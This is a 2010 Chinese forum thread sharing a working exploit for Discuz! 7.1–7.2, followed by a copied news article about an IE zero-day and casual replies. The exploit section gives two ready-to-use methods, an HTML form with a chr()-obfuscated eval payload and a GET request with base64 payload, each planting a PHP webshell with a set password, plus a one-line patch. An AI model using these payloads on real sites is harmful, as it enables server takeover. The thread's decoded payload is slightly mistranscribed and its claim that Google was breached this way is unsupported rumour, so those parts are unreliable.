返回列表 回复 发帖

[技巧] 谷歌被攻击的漏洞

本帖最后由 木虚影残 于 2010-1-19 00:57 编辑

以下代码仅供试验 不良后果自负 想想还是加这句话
discuz!7.1-7.2最新0ady漏洞 2010最新漏洞的使用方法附补丁
第一种方法:

先注册个用户然后把
  1. <form method="post" action="   http://www.hack6.com/bbs/misc.php" enctype="multipart/form-data">
  2. 帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
  3. <input type="hidden" name="action" value="imme_binding" />
  4. <input type="hidden" name="response[result]" value="1:2" />
  5. <input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" /> 本文来自hack6谜领域
  6. <input type="submit" name="topicsubmit" value="提交" class="submit" />
  7. </form>
复制代码
chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

里面有个提交地址改下,保存html

打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd


第二种方法:

直接GET,利用语句:

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法:

在common.inc.php上面加上
$response=$scriptlang=array();

官方发布修补补丁:
http://www.discuz.net/thread-1537673-1-1.html
据说谷歌就是被这个漏洞攻击的,
htm代码挺短的 不知道哪位能解释下代码含义  我试了下本站(discuz!7.1)(放心俺只是试验下 不会做啥坏事)
得到一个misc.php的 Binding Failed. Visit MSN IMME Q&A, please.出错页面
不知道是不是要把chr解码之后的代码赋值过去?还是sz都已经下了补丁或者加过$response=$scriptlang=array();了的说
开始研究黑客技术= =| 为俺的白客毕业设计奋斗
 北京时间1月16日,微软刚证实新发现了一个IE0day漏洞,针对该漏洞的攻击代码就已开始在网上扩散。经360安全中心验证,该漏洞几乎涉及所有IE浏览器,而微软尚未推出相应补丁,攻击代码外泄将在未来几天引发大规模的网页挂马攻击。有消息称Google等30多家企业已经因此遭到黑客攻击。360紧急提醒广大用户,请立即开启360安全卫士的“网页防火墙/网盾”功能,并使用360安全浏览器,以便应对即将到来的挂马攻击。
  据360安全专家石晓虹博士介绍,这一漏洞存在于IE6\7\8等所有浏览器版本中。在特定条件下,该漏洞可以使Mshtml.dll访问已经被释放的内存从而执行任意代码。也就是说,当网民访问黑客利用该漏洞构造的“挂马网页”时,电脑将自动下载运行黑客指定的任意木马病毒,使电脑成为受到别人远程控制的“肉鸡”。

  目前,针对这一高危0Day漏洞,微软公司只发布了一个安全公告,并未发布补丁。“但是攻击代码已在国外网站公开,包括黑客在内的几乎所有人都能轻易获得,意味着这一漏洞的危害将迅速蔓延。从历次0day漏洞公开化的规律判断,国内互联网上的大规模‘挂马’攻击将在未来几天内迅速爆发。”石晓虹说。

  经360安全中心工程师验证,360安全卫士的“网页防火墙/网盾”模块无需升级即可成功拦截由该漏洞引发的攻击。石晓虹表示,由于此次IE0day漏洞影响范围空前广泛,除了360安全浏览器能够拦截相应的攻击外,仅有在Win7环境下使用的IE8还算相对安全,其它所有版本的IE浏览器和使用IE内核的第三方浏览器都会被该漏洞攻击“通杀”。为此,360安全中心紧急提醒广大用户:上网时务必开启360安全卫士的“网页防火墙/网盾”功能,并使用360安全浏览器。同时,360安全中心将密切关注该漏洞的补丁信息,以便第一时间为广大用户修复这一漏洞。

  附:微软公司针对该IE0Day漏洞的安全公告

  http://www.microsoft.com/technet/security/advisory/979352.mspx
文字版新闻
本帖最后由 木虚影残 于 2010-1-19 00:51 编辑

那个ie是不是指服务器方
好像是被多国黑客攻击的
我的奋斗目标:注册帐号->看文章->看人家灌水->参与灌水->被封全站  ->接着灌水->没事->和版主搞好关系->当个版主->轻闲->当个大版版主->吊起来->被投诉->装孙子->被站务赏识->和站务套磁->请站务吃饭->申请实习站务->批准->开始实习->狂封人装大孙子->转正->名正言顺的灌水
返回列表